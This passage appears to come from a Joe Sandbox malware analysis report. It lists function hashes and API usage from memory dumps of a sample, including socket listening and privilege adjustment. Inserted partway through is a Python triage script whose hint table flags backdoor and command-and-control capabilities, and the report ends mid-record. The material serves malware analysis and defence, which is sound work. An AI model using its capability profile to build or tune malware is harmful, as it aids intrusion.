                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: bindclosesockethtonslistensocket
                • String ID:
                • API String ID: 564772725-0
                • Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                • Instruction ID: 7639010fca12233a93f18edaacb0714942ccd48183b1a2ce934c52e116504c89
                • Opcode Fuzzy Hash: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
                • Instruction Fuzzy Hash: 8D110435614B5582DB20EF12E82531AB362F788FE0F548665EE9D07FA4DF7EC1198704
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: %s!%s
                • API String ID: 0-2935588013
                • Opcode ID: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                • Instruction ID: 339d4963c7e48f7d5eab9816edd3ce58a4595f6ab105ea75f3ca995b74269556
                • Opcode Fuzzy Hash: 2575759d0ae14333fa4d595125301f6413fce9519f9dbc799c601f61bbf3305b
                • Instruction Fuzzy Hash: A2518D76B04A80C6DB24DF66D0406A97362F388FD8F84852AEF8E57758DF38C942C744
                APIs
                • LookupPrivilegeValueA.ADVAPI32 ref: 00670BEA
                • AdjustTokenPrivileges.ADVAPI32 ref: 00670C1A
                • GetLastError.KERNEL32 ref: 00670C24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                • String ID: %s
                • API String ID: 4244140340-620797490
                • Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                • Instruction ID: 2d8aa08465468c05ae3a8d0ae3c732c9e61822b2c26229a58da37efd2c490324
                • Opcode Fuzzy Hash: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
                • Instruction Fuzzy Hash: 8C217C72B00B01AAEB14DB71D4557ED73B6F758B88F84852A9E4C93B48EF74C629C390
                APIs
                • GetTickCount.KERNEL32 ref: 0067587B
                • Sleep.KERNEL32 ref: 006758CA
                • GetTickCount.KERNEL32 ref: 006758D0
                • WSAGetLastError.WS2_32 ref: 006758DA
                  • Part of subcall function 00675A20: ioctlsocket.WS2_32 ref: 00675A42
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$ErrorLastSleepioctlsocket
                • String ID:
                • API String ID: 1121440892-0
                • Opcode ID: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                • Instruction ID: fcd2c79b4b1f667fb8cce6bcefae5cc02d7a34ed8ad0a29df97c4b622c4aa0d8
                • Opcode Fuzzy Hash: 7368cb6fa517e1a070c78e6e07bfa46b364e9fef9c30544ba018e77da25e9e41
                • Instruction Fuzzy Hash: 77316B36B00F40D6DB00DBA2E4942AC77BAF388B90F51466ADE6E93B94DE31C555C344
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $<$ailure #%d - %s$e '
                • API String ID: 0-963976815
                • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction ID: 875dd6fd0587a974ac1acf23bae3dc22a9181987aed168fd786f8758df7145ac
                • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction Fuzzy Hash: 7D92D3B2329A8087DB58CB1DE4A173AB7A1F3C8B84F44512AE79B87794CE3CD551CB44
                APIs
                  • Part of subcall function 00676114: htonl.WS2_32 ref: 00676131
                • GetLastError.KERNEL32 ref: 0066DD33
                  • Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D
                • HeapCreate.KERNEL32 ref: 0066DCDA
                • HeapAlloc.KERNEL32 ref: 0066DCF8
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
                • String ID:
                • API String ID: 3419463915-0
                • Opcode ID: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                • Instruction ID: 52fe5b68eb4c93ed57c1751ba93f5dd3d32ebf759edd96eaf3318f5250c8f75b
                • Opcode Fuzzy Hash: ec0623d855ca9fea6adc12097b57476b8ed8efbce5d3b57090cc4cf496277255
                • Instruction Fuzzy Hash: 21E1B1B3B10B4187EB64DB35E8413AA63A2F799794F088125DB8E97B55EF3DE446C300
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID: signal
                • String ID:
                • API String ID: 1946981877-0
                • Opcode ID: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                • Instruction ID: e5ed25f9ec93a45af181b237418324cd8bf01173fb15efddcc2dfe5e442f875f
                • Opcode Fuzzy Hash: 06a55dde90fdba465f035aded498aa017c2ec9da3ac7fa2f421ff76a62bbfb83
                • Instruction Fuzzy Hash: D311D06672101043FB38273AC79EB2F0002A746349F9964378E0CA3BD4C9BECD814A4E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $<
                • API String ID: 0-428540627
                • Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction ID: 029e6c0c50f8178ac7a0873f28322fe44d81e9b0db15bd0f8f991eaa75d97d41
                • Opcode Fuzzy Hash: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
                • Instruction Fuzzy Hash: DE92D1B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: ailure #%d - %s$e '
                • API String ID: 0-4163927988
                • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction ID: ec6c28a2629b973ec245a2b5201f0cb2fca8ea9cd88e4a8d25ed745c8d90d11e
                • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction Fuzzy Hash: A7510AB6214A508BD714CB09E4E076AB7E1F3CCB94F84561AE38B8B768DB3CD545CB40
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction ID: 82b5d1063a700ef63de224473fde504350dfbea355db83ab48aaa914c7c492b6
                • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction Fuzzy Hash: 235241B221898587D708CB1CE4A177AB7E1F3C9B80F44852AE79B8B799CE3DD554DB00
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction ID: bc1ccaeb1530266df738040eaae3fae955189e00e07f680a2e6a2761b34d835d
                • Opcode Fuzzy Hash: 598c92a77d3f8dda66df7f00e42631b8bb25fed254ebd76fcbad8f8343bff3d7
                • Instruction Fuzzy Hash: 7E5250B22149458BD708CB1CE4A173AB7E2F3C9B80F44852AE7978BB99CE3DD555CB40
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction ID: ce355b0243cb639f74432b96568eac3b2256156551a439938dfd84188c558197
                • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction Fuzzy Hash: CA5240B22149818BD708CF1DE4A177AB7E1F3C9B80F44852AE78A8B799CA3DD545CF40
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction ID: 5164de9d090b26616ad0d3930c8619f64b1833a30633e82543ad9ecf93fad533
                • Opcode Fuzzy Hash: b966ddc3a4a27f87df3b0e1d0093439f08c10720c9c40116a815356078c1d6ce
                • Instruction Fuzzy Hash: 485255B22145808BD708CF1DE4A173AB7E2F3C9B80F44852AE7968BB99CA3DD555CF40
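The records in this list give, for each recovered function, the memory dump it was lifted from and an Opcode ID that fingerprints its instruction bytes. When the same Opcode ID turns up in both the 001A0000 and 00660000 dumps (b07265f8…, 598c92a7… and b966ddc3… above all do, with differing Instruction IDs because the absolute addresses differ), that is the analyst's evidence that one region holds a copy of the other's code, as expected of a loader stage and the payload it unpacks. The Python below is an added example, not part of the Joe Sandbox report: it parses records in this layout from a constructed sample (four records copied from this page), lists the Opcode IDs shared across dump regions, and attaches rough capability hints. The hint table keyed on substrings of the API ID field is an assumption of this example, not a Joe Sandbox feature.

```python
"""Parse Joe Sandbox "Memory Dump Source" function records and report
functions whose Opcode ID recurs in more than one dumped memory region."""
import re
from collections import defaultdict

# Constructed sample: four records copied from the report in its own layout.
# The first two share an Opcode ID across the 001A0000 and 00660000 dumps.
SAMPLE = """\
Memory Dump Source
• Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
Similarity
• API ID:
• String ID: $<$ailure #%d - %s$e '
• Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
• Instruction ID: 875dd6fd0587a974ac1acf23bae3dc22a9181987aed168fd786f8758df7145ac
Memory Dump Source
• Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
Similarity
• API ID:
• String ID: $<
• Opcode ID: b07265f8357a11157a4f9c9ad581af4fb46f207739a0a4220b37d603b0229bef
• Instruction ID: 029e6c0c50f8178ac7a0873f28322fe44d81e9b0db15bd0f8f991eaa75d97d41
Memory Dump Source
• Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
Similarity
• API ID: bindclosesockethtonslistensocket
• String ID:
• Opcode ID: be1f698a7e4eb4207d6933216863c257059b8865fc596cd8fbc22c7be6d18c17
• Instruction ID: 7639010fca12233a93f18edaacb0714942ccd48183b1a2ce934c52e116504c89
Memory Dump Source
• Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
Similarity
• API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID: %s
• Opcode ID: bf812f175a1fbc479699b50877281c9aa9b2d5b741073a8283bc0e57be89c079
• Instruction ID: 2d8aa08465468c05ae3a8d0ae3c732c9e61822b2c26229a58da37efd2c490324
"""

# A bullet line "• Key: value"; keys are letters/spaces, so API "ref:" lines
# and "Part of subcall function 0067...:" lines do not match and are skipped.
FIELD_RE = re.compile(r"^\s*•\s*([A-Za-z ]+?):\s*(.*?)\s*$")
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")
WANTED = ("API ID", "String ID", "Opcode ID", "Instruction ID")


def parse_records(text):
    """Return one dict per 'Memory Dump Source' block with the fields we use."""
    records, cur = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            cur = {}
            records.append(cur)
            continue
        m = FIELD_RE.match(line)
        if cur is None or not m:
            continue
        key, value = m.group(1), m.group(2)
        if key == "Source File":
            off = OFFSET_RE.search(value)
            cur["offset"] = int(off.group(1), 16) if off else None
            cur["source"] = value.split(",", 1)[0]
        elif key in WANTED:  # exact key match keeps "Opcode Fuzzy Hash" out
            cur[key] = value
    return records


def shared_functions(records):
    """Opcode ID -> sorted distinct dump offsets, only for IDs seen in >1 region."""
    by_opcode = defaultdict(set)
    for r in records:
        if r.get("Opcode ID") and r.get("offset") is not None:
            by_opcode[r["Opcode ID"]].add(r["offset"])
    return {k: sorted(v) for k, v in by_opcode.items() if len(v) > 1}


# Heuristic triage table (an assumption of this example). The report's API ID
# field is built from the function's API names split on capitalisation and
# sorted, so a distinctive fragment is enough to tag a record.
HINTS = {
    "listen": "opens a listening socket (possible bind/backdoor channel)",
    "Privileges": "adjusts token privileges",
    "HttpInternetRequest": "issues WinINet HTTP requests (possible HTTP C2)",
    "NamedPipe": "uses named pipes (possible SMB C2)",
    "sendto": "sends UDP datagrams (possible DNS C2)",
}


def capability_hints(record):
    """Sorted list of hints whose fragment occurs in the record's API ID."""
    api_id = record.get("API ID", "")
    return sorted(h for frag, h in HINTS.items() if frag in api_id)


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for opcode, offsets in shared_functions(recs).items():
        print(opcode[:16], "present at", [f"{o:08X}" for o in offsets])
    for r in recs:
        for hint in capability_hints(r):
            print(f"{r['offset']:08X} {r['Opcode ID'][:16]}: {hint}")
```

Run against the full report text instead of the sample, the shared-function list is the quickest way to confirm that the 00660000 region is the unpacked copy of the code first seen at 001A0000, and to pick which of the two dumps to load into a disassembler.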
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                • Instruction ID: 0e5a797c056a3b603dc5714ecbf7d852c9887fbf52f5745a24cee88d7c1c311a
                • Opcode Fuzzy Hash: 037a88b3a0e0121372c1e8929510804f124a0a98294513f128062ea9428e9fbd
                • Instruction Fuzzy Hash: 65E1D87A718A4296DF30DB25E4906AE73A1F7AA798F900115EF4D87748EF38CD85CB40
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                • Instruction ID: 97788dc11d1859d5af95f783d0f149c7900d8f14816fea1324a533bb0f57b2cf
                • Opcode Fuzzy Hash: c765d2767cc6881341997e71bcd018a989170b9b961d50c461c72776cf572830
                • Instruction Fuzzy Hash: ACE1D776318A4296DB20CBA5E4902AE67B3F795788F904115EF4DA7708EF39CE06CF41
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                • Instruction ID: 478000ad0292b6d07a9389f9cf01eca55c7dab24efc3bc0c4dde27ee49546022
                • Opcode Fuzzy Hash: 24a34f2510a6bdda36c019d7c9474c92714271ad77d8ea5857b13b9428aab684
                • Instruction Fuzzy Hash: D4E19CB6B10B4187EB24CB35E8413AA63A2F799795F488125DB8F97B51EF3CE485C340
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                • Instruction ID: d57bf8e47affcda77c628be205ea94685852170c192f6ea003444fb5114afa0b
                • Opcode Fuzzy Hash: a24fb40c631e4fb8bf858a82f26ba5d2e30cdac9459d39304e37b5ee64eada3e
                • Instruction Fuzzy Hash: 1ED1197B704B4292DF20DF65D8902AE6761FBE6798F900012EF4E97658EF34C986C740
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: free
                • String ID:
                • API String ID: 1294909896-0
                • Opcode ID: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                • Instruction ID: a68336142a694b4ea7778f662b1399bda95fa39f36c900c5556e207a4f108332
                • Opcode Fuzzy Hash: 1cd785112f09a1c6710790546be46074dbf73f7ffcb36dc8c2022c63c2ed85fc
                • Instruction Fuzzy Hash: 6ED1D572304A4292DF20DBA5D4902EEA766F794798F900116EF4E97718EF36CE46CB40
                Memory Dump Source
                • Source File: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1a0000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                • Instruction ID: 84848dc8c9b8eb3aba007217a0bbcd6b803f8d12ccf809fb5b860898a47fbc9a
                • Opcode Fuzzy Hash: 466de111811528a62f1f30eaf25973b5c551d59befa8947403ad49e7d2f1a529
                • Instruction Fuzzy Hash: 37617B32714B40D6EB249F62E88439E73E1F79CB94F11512AEA4E83B24DF79C995CB40
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction ID: 7bf834dff18ef2d97432191af032f825d37cd7e6b1fb4cc17482811a90c83697
                • Opcode Fuzzy Hash: aa69cfbe2dfd85e7477dd7a8e83c12114f76cab9aed25d9437113f4cd473f74e
                • Instruction Fuzzy Hash: D1510CB6214A508BD754CB0DE4A072AB7E2F3CCBD4F84521AE38B87B68DA3DD555CB40
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                • Instruction ID: c18a84c296884c2148f3584f8dcdcb74ce16d9512609834e75fb3b08a9be0ab6
                • Opcode Fuzzy Hash: 7d5c60bfde02073a6b2f4914ae9643feb224790bf45e20c3c7227f1ad55a4277
                • Instruction Fuzzy Hash: 9EF0FFD7E1DAE26ADB2346640C7D1982F57A4B2A2134DC14F8B8053F93A4060C01D312
                Memory Dump Source
                • Source File: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                • Instruction ID: 6df1996fe5ab077fac6f5f648561be467765c73faf68bb16cd4171b126be2ea7
                • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                • Instruction Fuzzy Hash: 60D0C7C7F5DFD096D32281A40C6A0692F91B5F291535E818FAE4497397B40C1D4D5315
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                • Instruction ID: 539d35eff73e93ac76602df4a068df1f8cc5d4c668e64a5cd509f388140b9171
                • Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
                • Instruction Fuzzy Hash: 44D05EFBE1DBD21BEB6382284C3D2882F66A162A2074C408F878007FA3E44A1801C311
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction ID: c624cead7d371148b89316b008a246588d0c5e32bc8caaeb701ddc815d516811
                • Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
                • Instruction Fuzzy Hash: B1C04C57A14AD1579B125A15087A5942B57E5D3D3238A82998D5183E47900A5C17E311
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction ID: 8009e9f2c8603c0aa392f075b10aaf32735fc7346bb9e3a3e5ffbe436e7b62eb
                • Opcode Fuzzy Hash: e22b888f4c5b362cda7f8ac34c3812d6ca885ba57bea4ef0bbaaf1add4c6c28a
                • Instruction Fuzzy Hash: 60C012DBE1DEC15AE72342544C7509F3ED694F2D1030F4046CF4402753A1460C106251
                Memory Dump Source
                • Source File: 00000000.00000002.3496984975.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.3496974068.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3496996154.0000000000404000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497006759.0000000000405000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497030693.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497041595.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.3497052454.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_2VsJzzWTpA.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                • Instruction ID: a90e02ae8d049601286e53e7699458ba48d96224d24485149046b028ffd0d41f
                • Opcode Fuzzy Hash: a67b07fff93ef3e3d087b98e4049d786ac120a8a9678935b14bd3a1a6ec1c101
                • Instruction Fuzzy Hash: 90B012A7448D1181C3000F30CC013E03334D755786F042461620440192C22CC254D10C
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                • Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
                • Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
                • Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_660000_2VsJzzWTpA.jbxd
                Yara matches
                Similarity
                • API ID: acceptioctlsocket$closesockethtonlselect
                • String ID:
                • API String ID: 2003300010-0
                • Opcode ID: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                • Instruction ID: 3a22ab2671ea9756bc4af0d6e732f6acd978155fc56be1d3b0b411975531676c
                • Opcode Fuzzy Hash: 54efb49355ab49030012f44656aa982b574d006ff9989bba4d15e008082401ba
                • Instruction Fuzzy Hash: 2D919932710A919BDB60DF21E9507AD33A6F788B98F008229EB4E47F58DF35C665CB10
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true
                Joe Sandbox IDA Plugin
